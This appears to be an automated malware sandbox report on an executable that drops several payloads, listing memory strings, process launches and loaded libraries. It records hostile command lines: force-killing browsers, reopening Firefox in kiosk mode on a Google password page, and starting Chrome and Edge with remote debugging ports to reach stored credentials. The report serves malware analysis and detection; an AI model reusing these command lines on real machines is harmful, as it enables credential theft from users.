Source: 3e169c0a7e.exe, 00000009.00000003.2913175093.0000000005375000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900671533.0000000005377000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2925719344.0000000005B58000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2942471201.0000000005B46000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926030012.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000003.3297806031.000000001D7D8000.00000004.00000020.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000003.3175337806.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000003.3163469792.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3055967372.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041265571.0000000005B04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3586807815.000000001D8E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3586807815.000000001D8E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe

ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe "C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe"
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe "C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe"
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Process created: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe "C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe"
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7796 -s 264
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe "C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe "C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe "C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe"
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2180 -parentBuildID 20230927232528 -prefsHandle 2116 -prefMapHandle 2100 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8757b89c-e953-4ab1-960f-4c48d4b5d735} 3276 "\\.\pipe\gecko-crash-server-pipe.3276" 1b625d6df10 socket
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe "C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2344,i,6944280145687468448,6337840555587175668,262144 /prefetch:8
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4432 -parentBuildID 20230927232528 -prefsHandle 4084 -prefMapHandle 4080 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b74bb88-0790-41f2-9d81-5248e5eb58ba} 3276 "\\.\pipe\gecko-crash-server-pipe.3276" 1b638209e10 rdd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe "C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe "C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe"
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2732 --field-trial-handle=2660,i,4893309152758529203,13133286740846898616,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2824 --field-trial-handle=2076,i,3800076312962857539,4475748106252003537,262144 /prefetch:3
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe "C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe "C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe "C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe "C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe "C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe "C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Process created: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe "C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2180 -parentBuildID 20230927232528 -prefsHandle 2116 -prefMapHandle 2100 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8757b89c-e953-4ab1-960f-4c48d4b5d735} 3276 "\\.\pipe\gecko-crash-server-pipe.3276" 1b625d6df10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4432 -parentBuildID 20230927232528 -prefsHandle 4084 -prefMapHandle 4080 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b74bb88-0790-41f2-9d81-5248e5eb58ba} 3276 "\\.\pipe\gecko-crash-server-pipe.3276" 1b638209e10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2344,i,6944280145687468448,6337840555587175668,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2732 --field-trial-handle=2660,i,4893309152758529203,13133286740846898616,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2824 --field-trial-handle=2076,i,3800076312962857539,4475748106252003537,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
